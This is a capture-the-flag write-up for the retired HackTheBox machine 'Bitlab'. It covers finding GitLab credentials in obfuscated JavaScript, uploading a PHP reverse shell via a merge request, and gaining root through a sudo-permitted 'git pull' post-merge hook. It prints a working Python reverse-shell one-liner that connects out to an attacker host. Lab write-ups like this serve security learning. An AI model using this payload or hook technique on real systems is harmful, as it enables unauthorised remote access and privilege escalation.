Hackthebox - Bitlab writeup

Machine Data

  • IP address:
  • OS:             Linux
  • Rating:         Medium
  • Points:         30
  • Phased out: Jan 11th 2020

Initial scan

Nmap reveals only port 22 and 80 open.

Opening the main webpage  with a browser shows a local instance of Gitlab, but no public projects: we need to sign in.

Initial foothold

Looking for web folder with dirb, we can find a link which shows additional URLs

The last link is encoded with a javascript function

When decoded the function reveals some HEX strings values:

  • Value
  • user_login;
  • getElementbyId; 
  • clave; 
  • user_password; 
  • 11des0081x.

It looks like the gitlab webpage can be accessed with user clave and password 11des0081x:

To exploit this VM a basic knowledge of git is required.

Looking at project “Administrator / Profile” we can see that we can make changes to It.
We can, for example:

  1. Create a new branch,
  2. Add a new php file (i.e. xxx.php) to that branch,
  3. Commit the change, 
  4. Create a merge request of the branch into master,
  5. Approve the merge.

This sequence of operations will push the new file directly to the website and will be accessible as

We can therefore use this sequence to upload a php reverse shell

As a reference for php revrerse shell I used the great site Pentestmonkey and the github repo PayloadsAllTheThings

So we can easily get our reverse shell:

User and root exploitation

We’re in the machine as www-data users and we can find that www-data user can run some commands as root without authentication through sudo:

If we try to run the command it will fail because the shell is not truly interactive shell, so we have to use a trick to have a better shell:

python -c 'import pty;pty.spawn("/bin/sh")'

Now: how can we exploit the “git pull” command to get a shell?

The basic idea behind it it the use of git hooks (githooks).

Git hooks are scripts that are run when specific events occurs on a repo. In this case the post-merge script is executed as a consequence of a “git pull” command

This sequence of operations to use this hook can be:

  1. Copy the git repo of “Profile” project to a convenient folder,
  2. Create a post-merge hook that contains a specific shell script,
  3. Change something in the project on the Gitlab web page (this is needed to run a succesfull "git pull" command on the local git repo
  4. run a “sudo git pull” in our local git repo: this will trigger the post-merge script as root

Now to the practical part...

Create the local copy of the git repo in a temporary folder

Edit the .git/hooks/post-merge adding a python reverse shell (be aware that editors like vi or nano might not behave properly within the reverse shell)
I prefer to use:

$ cat > /tmp/nikita/profile/.git/hooks/post-merge << EOF
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

This is a second reverse shell on port 6666 that we'll have to take care...

Now let’s go to gitlab webpage  and execute again the operation of repo merge:

  • change our file xxx.php (i.e. edit a comment line) 
  • Commit 
  • Submit merge request 
  • Approve merge request

Now let’s open a netcat on our computer listening on port 6666

Then go back to terminal on bitlab machine and run “sudo /usr/bin/git pull”

It shows some logs about git, saying that it’s merging the changes from the repo to local folder. Then it executes the post-merge script, that will make a reverse shell connection as root on port 6666

Now we are root on the bitlab machine and we can easily get the flags:

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